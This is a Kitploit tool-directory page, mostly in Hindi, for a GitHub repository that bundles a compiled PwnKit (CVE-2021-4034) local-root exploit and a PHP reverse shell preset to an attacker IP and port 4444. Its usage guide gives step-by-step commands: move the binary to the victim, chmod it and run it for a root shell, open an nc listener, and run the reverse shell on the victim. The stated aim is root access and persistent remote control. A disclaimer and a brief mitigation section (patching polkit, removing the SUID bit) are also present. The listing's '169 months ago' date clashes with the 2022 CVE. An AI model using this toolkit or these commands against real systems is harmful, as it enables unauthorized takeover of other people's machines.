Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
hack — एक सुरक्षा अनुसंधान भंडार जिसमें CVE-2021-4034 (PwnKit) भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) और लिनक्स वातावरण में विशेषाधिकार वृद्धि और दूरस्थ निष्पादन के प्रदर्शन के लिए स्क्रिप्टिंग उपयोगिताएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/jscamposx/hack
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubjscamposx/hack

hack

एक सुरक्षा अनुसंधान भंडार जिसमें CVE-2021-4034 (PwnKit) भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) और लिनक्स वातावरण में विशेषाधिकार वृद्धि और दूरस्थ निष्पादन के प्रदर्शन के लिए स्क्रिप्टिंग उपयोगिताएँ शामिल हैं।

रिपॉजिटरी देखें
169 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

💀 PwnKit (CVE-2021-4034) और रिवर्स शेल टूलकिट

Security Research CVE Language

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। लेखक इन उपकरणों के दुरुपयोग के लिए जिम्मेदार नहीं है। इसे केवल नियंत्रित वातावरण में या जहां आपके पास स्पष्ट अनुमति हो, वहां उपयोग करें।


📜 विवरण

यह रिपॉजिटरी में PwnKit (CVE-2021-4034) भेद्यता के लिए संकलित एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो Polkit के pkexec घटक में एक महत्वपूर्ण स्थानीय विशेषाधिकार वृद्धि दोष है।

इसके अलावा, इसमें एक PHP में रिवर्स शेल स्क्रिप्ट शामिल है जो शोषण के बाद या प्रारंभिक पहुंच वेक्टर के रूप में तैनात करने के लिए तैयार है।

🎯 उद्देश्य

कमजोर Linux सिस्टम पर root पहुंच प्राप्त करना और रिवर्स शेल के माध्यम से स्थायित्व या दूरस्थ नियंत्रण स्थापित करना।


📂 शस्त्रागार की सामग्री

1. PwnKit (ELF Binary)

CVE-2021-4034 के लिए संकलित शोषण।

  • कार्य: pkexec के पर्यावरण चरों में हेरफेर करता है ताकि एक दुर्भावनापूर्ण साझा लाइब्रेरी लोड की जा सके और root के रूप में कोड निष्पादित किया जा सके।
  • आर्किटेक्चर: x86_64 (Linux)।
  • निर्भरताएँ: लक्ष्य पर pkexec स्थापित होना आवश्यक है।

2. reverseShell.php

रिवर्स कनेक्शन स्थापित करने के लिए एक हल्का पेलोड।

  • वर्तमान कॉन्फ़िगरेशन:
    • IP: 192.168.1.8
    • पोर्ट: 4444
    • शेल: /bin/bash
  • उपयोग: इसे CLI (php reverseShell.php) के माध्यम से निष्पादित किया जा सकता है या कमजोर वेब सर्वर में इंजेक्ट किया जा सकता है।

🚀 उपयोग गाइड

चरण 1: विशेषाधिकार वृद्धि (PwnKit)

  1. PwnKit बाइनरी को पीड़ित सिस्टम में स्थानांतरित करें।
  2. निष्पादन अनुमतियाँ दें:
    root@kitploit:~
    chmod +x PwnKit
    
  3. शोषण चलाएं:
    root@kitploit:~
    ./PwnKit
    
    यदि सफल होता है, तो आपको तुरंत रूट विशेषाधिकारों वाला एक शेल मिलना चाहिए।

चरण 2: दूरस्थ कनेक्शन (रिवर्स शेल)

  1. अपनी हमलावर मशीन पर, Netcat के साथ एक लिसनर शुरू करें:
    root@kitploit:~
    nc -lvnp 4444
    
  2. यदि आपका IP डिफ़ॉल्ट कॉन्फ़िगरेशन से भिन्न है तो reverseShell.php को संपादित करें।
  3. पीड़ित पर स्क्रिप्ट चलाएं (सामान्य उपयोगकर्ता के रूप में या PwnKit का उपयोग करने के बाद रूट के रूप में):
    root@kitploit:~
    php reverseShell.php
    

🛠️ तकनीकी विवरण (CVE-2021-4034)

यह भेद्यता इस बात में निहित है कि pkexec कमांड लाइन तर्कों को कैसे संभालता है। तर्कों की एक खाली सूची पारित करने पर, pkexec सीमा से बाहर argv[1] तक पहुँचने का प्रयास करता है, जो एक हमलावर को मेमोरी में पर्यावरण चरों को अधिलेखित करने की अनुमति देता है, विशेष रूप से निष्पादन प्रवाह को अपहरण करने के लिए एक दुर्भावनापूर्ण GCONV_PATH चर इंजेक्ट करके।

  • प्रकटीकरण तिथि: जनवरी 2022।
  • प्रभाव: अधिकांश डिफ़ॉल्ट Linux वितरणों (Ubuntu, Debian, Fedora, CentOS) पर तत्काल रूट पहुंच।

🛡️ शमन

इस शोषण से बचाव के लिए:

  1. Polkit अपडेट करें: अपने वितरण द्वारा प्रदान किए गए सुरक्षा पैच स्थापित करें।
  2. SUID बिट हटाएं (अस्थायी समाधान):
    root@kitploit:~
    chmod 0755 /usr/bin/pkexec
    

Happy Hacking! 🏴‍☠️

टूल डाउनलोड करें